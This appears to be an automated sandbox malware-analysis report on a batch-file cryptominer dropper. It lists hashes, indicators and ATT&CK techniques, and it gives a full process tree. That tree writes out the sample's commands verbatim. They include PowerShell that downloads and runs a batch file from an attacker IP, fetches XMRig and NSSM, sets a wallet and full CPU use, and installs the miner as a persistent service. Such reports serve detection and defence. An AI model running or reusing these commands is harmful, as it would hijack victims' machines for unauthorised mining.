xmrig | 9646675a0d5cb5ccf4aa9408fc698bf5d020d27015c69c9c1ab0e2290137fdd5

Analysis

max time kernel
150s
max time network
137s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
01/07/2024, 21:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

64322430719860.bat
Size

524B
MD5

92b307667679cc4bca93a2417be6137b
SHA1

5347620d753e52dbd274d04ae87356e09fe1c16d
SHA256

9646675a0d5cb5ccf4aa9408fc698bf5d020d27015c69c9c1ab0e2290137fdd5
SHA512

d99751550c337010791b8522ce1966384b41b2f17d6bfaf89034ce9ef25e2648e99ce5b345c6858c79b7af65b357036b42ed88447bca5854644d12ce9cf8a791

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.254.97.190:2024/test.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 16 IoCs

miner

resource	yara_rule
behavioral1/files/0x000700000001ac4f-129.dat	family_xmrig
behavioral1/files/0x000700000001ac4f-129.dat	xmrig
behavioral1/memory/4300-131-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3016-413-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3016-414-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3016-415-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3016-416-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3016-417-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3016-418-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3016-419-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3016-420-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3016-421-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3016-422-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3016-423-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3016-424-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3016-425-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
1	4616	powershell.exe
4	3312	powershell.exe
6	3696	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
4300	xmrig.exe
1392	nssm.exe
4360	nssm.exe
4132	nssm.exe
3992	nssm.exe
2068	nssm.exe
3496	nssm.exe
1792	nssm.exe
3016	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
6	raw.githubusercontent.com
3	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4604	sc.exe
2284	sc.exe
1176	sc.exe
3604	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4616	powershell.exe
1348	powershell.exe
5072	powershell.exe
1592	powershell.exe
2068	powershell.exe
2232	powershell.exe
2476	powershell.exe
5056	powershell.exe
3696	powershell.exe
3312	powershell.exe
3128	powershell.exe
2012	powershell.exe
4280	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
2512	timeout.exe
2596	timeout.exe
2716	timeout.exe
4644	timeout.exe
3844	timeout.exe
1016	timeout.exe
4852	timeout.exe
4832	timeout.exe
4544	timeout.exe
1664	timeout.exe
4700	timeout.exe
1896	timeout.exe
1544	timeout.exe
2532	timeout.exe
3372	timeout.exe
1440	timeout.exe
4560	timeout.exe
504	timeout.exe
4572	timeout.exe
2960	timeout.exe
1432	timeout.exe
3576	timeout.exe
4564	timeout.exe
2384	timeout.exe
1380	timeout.exe
2600	timeout.exe
2424	timeout.exe
4260	timeout.exe
4460	timeout.exe
2180	timeout.exe
2960	timeout.exe
4100	timeout.exe
2968	timeout.exe
3216	timeout.exe
1044	timeout.exe
4316	timeout.exe
820	timeout.exe
2844	timeout.exe
2712	timeout.exe
3000	timeout.exe
3216	timeout.exe
3980	timeout.exe
3196	timeout.exe
1292	timeout.exe
2068	timeout.exe
4800	timeout.exe
3784	timeout.exe
4268	timeout.exe
3360	timeout.exe
4844	timeout.exe
2324	timeout.exe
560	timeout.exe
1832	timeout.exe
3228	timeout.exe
756	timeout.exe
1392	timeout.exe
4412	timeout.exe
3496	timeout.exe
2460	timeout.exe
3052	timeout.exe
4680	timeout.exe
4588	timeout.exe
3676	timeout.exe
4236	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4748	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
4616	powershell.exe
4616	powershell.exe
4616	powershell.exe
3312	powershell.exe
3312	powershell.exe
3312	powershell.exe
1348	powershell.exe
1348	powershell.exe
1348	powershell.exe
3128	powershell.exe
3128	powershell.exe
3128	powershell.exe
1592	powershell.exe
1592	powershell.exe
1592	powershell.exe
2012	powershell.exe
2012	powershell.exe
2012	powershell.exe
2068	powershell.exe
2068	powershell.exe
2068	powershell.exe
5072	powershell.exe
5072	powershell.exe
5072	powershell.exe
2232	powershell.exe
2232	powershell.exe
2232	powershell.exe
2476	powershell.exe
2476	powershell.exe
2476	powershell.exe
5056	powershell.exe
5056	powershell.exe
5056	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe
4280	powershell.exe
4280	powershell.exe
4280	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4616	powershell.exe
Token: SeDebugPrivilege	4748	taskkill.exe
Token: SeDebugPrivilege	3312	powershell.exe
Token: SeDebugPrivilege	1348	powershell.exe
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeDebugPrivilege	1592	powershell.exe
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	2068	powershell.exe
Token: SeDebugPrivilege	5072	powershell.exe
Token: SeDebugPrivilege	2232	powershell.exe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeDebugPrivilege	3696	powershell.exe
Token: SeDebugPrivilege	4280	powershell.exe
Token: SeLockMemoryPrivilege	3016	xmrig.exe
Token: SeIncreaseQuotaPrivilege	4844	WMIC.exe
Token: SeSecurityPrivilege	4844	WMIC.exe
Token: SeTakeOwnershipPrivilege	4844	WMIC.exe
Token: SeLoadDriverPrivilege	4844	WMIC.exe
Token: SeSystemProfilePrivilege	4844	WMIC.exe
Token: SeSystemtimePrivilege	4844	WMIC.exe
Token: SeProfSingleProcessPrivilege	4844	WMIC.exe
Token: SeIncBasePriorityPrivilege	4844	WMIC.exe
Token: SeCreatePagefilePrivilege	4844	WMIC.exe
Token: SeBackupPrivilege	4844	WMIC.exe
Token: SeRestorePrivilege	4844	WMIC.exe
Token: SeShutdownPrivilege	4844	WMIC.exe
Token: SeDebugPrivilege	4844	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4844	WMIC.exe
Token: SeRemoteShutdownPrivilege	4844	WMIC.exe
Token: SeUndockPrivilege	4844	WMIC.exe
Token: SeManageVolumePrivilege	4844	WMIC.exe
Token: 33	4844	WMIC.exe
Token: 34	4844	WMIC.exe
Token: 35	4844	WMIC.exe
Token: 36	4844	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4844	WMIC.exe
Token: SeSecurityPrivilege	4844	WMIC.exe
Token: SeTakeOwnershipPrivilege	4844	WMIC.exe
Token: SeLoadDriverPrivilege	4844	WMIC.exe
Token: SeSystemProfilePrivilege	4844	WMIC.exe
Token: SeSystemtimePrivilege	4844	WMIC.exe
Token: SeProfSingleProcessPrivilege	4844	WMIC.exe
Token: SeIncBasePriorityPrivilege	4844	WMIC.exe
Token: SeCreatePagefilePrivilege	4844	WMIC.exe
Token: SeBackupPrivilege	4844	WMIC.exe
Token: SeRestorePrivilege	4844	WMIC.exe
Token: SeShutdownPrivilege	4844	WMIC.exe
Token: SeDebugPrivilege	4844	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4844	WMIC.exe
Token: SeRemoteShutdownPrivilege	4844	WMIC.exe
Token: SeUndockPrivilege	4844	WMIC.exe
Token: SeManageVolumePrivilege	4844	WMIC.exe
Token: 33	4844	WMIC.exe
Token: 34	4844	WMIC.exe
Token: 35	4844	WMIC.exe
Token: 36	4844	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4104	WMIC.exe
Token: SeSecurityPrivilege	4104	WMIC.exe
Token: SeTakeOwnershipPrivilege	4104	WMIC.exe
Token: SeLoadDriverPrivilege	4104	WMIC.exe
Token: SeSystemProfilePrivilege	4104	WMIC.exe
Token: SeSystemtimePrivilege	4104	WMIC.exe
Token: SeProfSingleProcessPrivilege	4104	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3016	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4584 wrote to memory of 4616	4584	cmd.exe	73
PID 4584 wrote to memory of 4616	4584	cmd.exe	73
PID 4616 wrote to memory of 4540	4616	powershell.exe	74
PID 4616 wrote to memory of 4540	4616	powershell.exe	74
PID 4540 wrote to memory of 2968	4540	cmd.exe	75
PID 4540 wrote to memory of 2968	4540	cmd.exe	75
PID 2968 wrote to memory of 912	2968	net.exe	76
PID 2968 wrote to memory of 912	2968	net.exe	76
PID 4540 wrote to memory of 4504	4540	cmd.exe	77
PID 4540 wrote to memory of 4504	4540	cmd.exe	77
PID 4540 wrote to memory of 3984	4540	cmd.exe	78
PID 4540 wrote to memory of 3984	4540	cmd.exe	78
PID 4540 wrote to memory of 4760	4540	cmd.exe	79
PID 4540 wrote to memory of 4760	4540	cmd.exe	79
PID 4540 wrote to memory of 2376	4540	cmd.exe	80
PID 4540 wrote to memory of 2376	4540	cmd.exe	80
PID 4540 wrote to memory of 2568	4540	cmd.exe	81
PID 4540 wrote to memory of 2568	4540	cmd.exe	81
PID 4540 wrote to memory of 2284	4540	cmd.exe	82
PID 4540 wrote to memory of 2284	4540	cmd.exe	82
PID 4540 wrote to memory of 1176	4540	cmd.exe	83
PID 4540 wrote to memory of 1176	4540	cmd.exe	83
PID 4540 wrote to memory of 4748	4540	cmd.exe	84
PID 4540 wrote to memory of 4748	4540	cmd.exe	84
PID 4540 wrote to memory of 3312	4540	cmd.exe	86
PID 4540 wrote to memory of 3312	4540	cmd.exe	86
PID 4540 wrote to memory of 1348	4540	cmd.exe	87
PID 4540 wrote to memory of 1348	4540	cmd.exe	87
PID 4540 wrote to memory of 3128	4540	cmd.exe	88
PID 4540 wrote to memory of 3128	4540	cmd.exe	88
PID 4540 wrote to memory of 4300	4540	cmd.exe	89
PID 4540 wrote to memory of 4300	4540	cmd.exe	89
PID 4540 wrote to memory of 4220	4540	cmd.exe	90
PID 4540 wrote to memory of 4220	4540	cmd.exe	90
PID 4220 wrote to memory of 1592	4220	cmd.exe	91
PID 4220 wrote to memory of 1592	4220	cmd.exe	91
PID 1592 wrote to memory of 5088	1592	powershell.exe	92
PID 1592 wrote to memory of 5088	1592	powershell.exe	92
PID 4540 wrote to memory of 2012	4540	cmd.exe	93
PID 4540 wrote to memory of 2012	4540	cmd.exe	93
PID 4540 wrote to memory of 2068	4540	cmd.exe	94
PID 4540 wrote to memory of 2068	4540	cmd.exe	94
PID 4540 wrote to memory of 5072	4540	cmd.exe	95
PID 4540 wrote to memory of 5072	4540	cmd.exe	95
PID 4540 wrote to memory of 2232	4540	cmd.exe	96
PID 4540 wrote to memory of 2232	4540	cmd.exe	96
PID 4540 wrote to memory of 2476	4540	cmd.exe	97
PID 4540 wrote to memory of 2476	4540	cmd.exe	97
PID 4540 wrote to memory of 5056	4540	cmd.exe	98
PID 4540 wrote to memory of 5056	4540	cmd.exe	98
PID 4540 wrote to memory of 3696	4540	cmd.exe	99
PID 4540 wrote to memory of 3696	4540	cmd.exe	99
PID 4540 wrote to memory of 4280	4540	cmd.exe	100
PID 4540 wrote to memory of 4280	4540	cmd.exe	100
PID 4540 wrote to memory of 3604	4540	cmd.exe	101
PID 4540 wrote to memory of 3604	4540	cmd.exe	101
PID 4540 wrote to memory of 4604	4540	cmd.exe	102
PID 4540 wrote to memory of 4604	4540	cmd.exe	102
PID 4540 wrote to memory of 1392	4540	cmd.exe	103
PID 4540 wrote to memory of 1392	4540	cmd.exe	103
PID 4540 wrote to memory of 4360	4540	cmd.exe	104
PID 4540 wrote to memory of 4360	4540	cmd.exe	104
PID 4540 wrote to memory of 4132	4540	cmd.exe	105
PID 4540 wrote to memory of 4132	4540	cmd.exe	105

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\64322430719860.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4584
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://185.254.97.190:2024/test.txt', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6496.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4540
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2968
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:912
  - - C:\Windows\system32\where.exe
      where powershell
      4⤵
      PID:4504
  - - C:\Windows\system32\where.exe
      where find
      4⤵
      PID:3984
  - - C:\Windows\system32\where.exe
      where findstr
      4⤵
      PID:4760
  - - C:\Windows\system32\where.exe
      where tasklist
      4⤵
      PID:2376
  - - C:\Windows\system32\where.exe
      where sc
      4⤵
      PID:2568
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:2284
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:1176
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im xmrig.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4748
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3312
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3128
  - - C:\Users\Admin\moneroocean\xmrig.exe
      "C:\Users\Admin\moneroocean\xmrig.exe" --help
      4⤵
      Executes dropped EXE
      PID:4300
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4220
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1592
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:5088
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2012
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2068
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Dfzpkzrm\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5072
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2232
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2476
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5056
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4280
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:3604
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:4604
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:1392
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
      4⤵
      Executes dropped EXE
      PID:4360
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
      4⤵
      Executes dropped EXE
      PID:4132
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
      4⤵
      Executes dropped EXE
      PID:3992
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
      4⤵
      Executes dropped EXE
      PID:2068
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
      4⤵
      Executes dropped EXE
      PID:3496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4736
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4844
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2472
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4104
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1832
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3980
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:784
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1432
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3360
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2592
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:512
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2108
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2236
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3576
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1472
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1136
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5056
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3196
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:348
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1592
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:916
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2716
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2008
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:560
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:200
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3460
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2420
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2120
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3020
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3620
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4132
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1320
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4228
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4492
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:804
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4516
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4716
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
